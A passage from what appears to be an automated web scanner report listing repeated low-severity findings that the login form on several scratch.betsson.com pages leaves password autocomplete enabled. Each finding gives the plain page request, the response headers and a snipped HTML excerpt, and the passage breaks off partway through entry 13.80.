Host:   https://scratch.betsson.com
Path:   /en/OurScratchcards

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (relative to /en/OurScratchcards; see the response excerpt below).

The form contains the following password field with autocomplete enabled: tbPassword (no autocomplete="off" attribute on the input or on its form).

Request

GET /en/OurScratchcards HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:38 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:38 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:39 GMT
Connection: close
Content-Length: 189403


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.66. https://scratch.betsson.com/en/Ourwinners

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Ourwinners

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (relative to /en/Ourwinners; see the response excerpt below).

The form contains the following password field with autocomplete enabled: tbPassword (no autocomplete="off" attribute on the input or on its form).

Request

GET /en/Ourwinners HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:49 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:49 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:49 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:49 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:49 GMT
Connection: close
Content-Length: 107524


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.67. https://scratch.betsson.com/en/Slots/5th-Avenue

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/5th-Avenue

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (relative to /en/Slots/5th-Avenue; see the response excerpt below).

The form contains the following password field with autocomplete enabled: tbPassword (no autocomplete="off" attribute on the input or on its form).

Request

GET /en/Slots/5th-Avenue HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:27 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:27 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:27 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:27 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:26 GMT
Connection: close
Content-Length: 102689


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.68. https://scratch.betsson.com/en/Slots/Adventure-Jack

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Adventure-Jack

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients (relative to /en/Slots/Adventure-Jack; see the response excerpt below).

The form contains the following password field with autocomplete enabled: tbPassword (no autocomplete="off" attribute on the input or on its form).

Request

GET /en/Slots/Adventure-Jack HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:26 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:26 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:26 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:26 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:26 GMT
Connection: close
Content-Length: 102686


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.69. https://scratch.betsson.com/en/Slots/Atlantis

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Atlantis

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Slots/Atlantis HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:38 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:38 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:38 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:38 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.70. https://scratch.betsson.com/en/Slots/Bon-Apetit

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Bon-Apetit

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Slots/Bon-Apetit HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:15 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:15 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:15 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:15 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:15 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.71. https://scratch.betsson.com/en/Slots/Cafe-Paris

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Cafe-Paris

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Slots/Cafe-Paris HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:56 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:56 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:56 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:56 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:56 GMT
Connection: close
Content-Length: 102690


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.72. https://scratch.betsson.com/en/Slots/Castle-Slots

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Castle-Slots

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Slots/Castle-Slots HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:29 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:29 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:29 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:29 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:28 GMT
Connection: close
Content-Length: 102677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.73. https://scratch.betsson.com/en/Slots/Chic-Boutique

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Chic-Boutique

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Slots/Chic-Boutique HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:40 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:40 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:40 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:40 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:39 GMT
Connection: close
Content-Length: 102690


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.74. https://scratch.betsson.com/en/Slots/Conga-Beat

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Conga-Beat

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Slots/Conga-Beat HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:18 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:18 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:18 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:18 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:17 GMT
Connection: close
Content-Length: 102677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.75. https://scratch.betsson.com/en/Slots/Egyptian-Magic

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Egyptian-Magic

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Slots/Egyptian-Magic HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:50 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:50 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:50 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:50 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:50 GMT
Connection: close
Content-Length: 102685


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.76. https://scratch.betsson.com/en/Slots/Esmeralda

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Esmeralda

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Slots/Esmeralda HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:16 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:16 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:16 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:16 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:16 GMT
Connection: close
Content-Length: 102690


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.77. https://scratch.betsson.com/en/Slots/Fair-Play

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Fair-Play

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Slots/Fair-Play HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:15 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:15 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:15 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:15 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:15 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.78. https://scratch.betsson.com/en/Slots/Fantasia

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Fantasia

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Slots/Fantasia HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:37 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:37 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:37 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:37 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:36 GMT
Connection: close
Content-Length: 102695


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.79. https://scratch.betsson.com/en/Slots/Grand-Crown

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Grand-Crown

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Slots/Grand-Crown HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:17 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:17 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:55:17 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:55:17 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:55:17 GMT
Connection: close
Content-Length: 102677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
                       <input type="password" value="" name="tbPassword" id="tbPassword" tabindex="2" onkeydown="if(event.keyCode==13){doLogin();return false;}"/>
                       <span class="cl">
...[SNIP]...

13.80. https://scratch.betsson.com/en/Slots/Holiday-Hotel

Summary

Severity:   Low
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/Slots/Holiday-Hotel

Issue detail

The page contains a form with the following action URL: #fallback-url-for-non-javascript-clients. The form contains the following password field with autocomplete enabled: tbPassword.

Request

GET /en/Slots/Holiday-Hotel HTTP/1.1
Host: scratch.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: site=en; language=en; lggdnstt=0; ASP.NET_SessionId=aj3z4c45t0hhaiby1ippyh55;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:23 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:23 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:54:23 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:54:23 GMT; path=/
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:54:23 GMT
Connection: close
Content-Length: 102685


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<div id="login-form">
           <form action="#fallback-url-for-non-javascript-clients" method="post">
               <fieldset>
...[SNIP]...
</label>
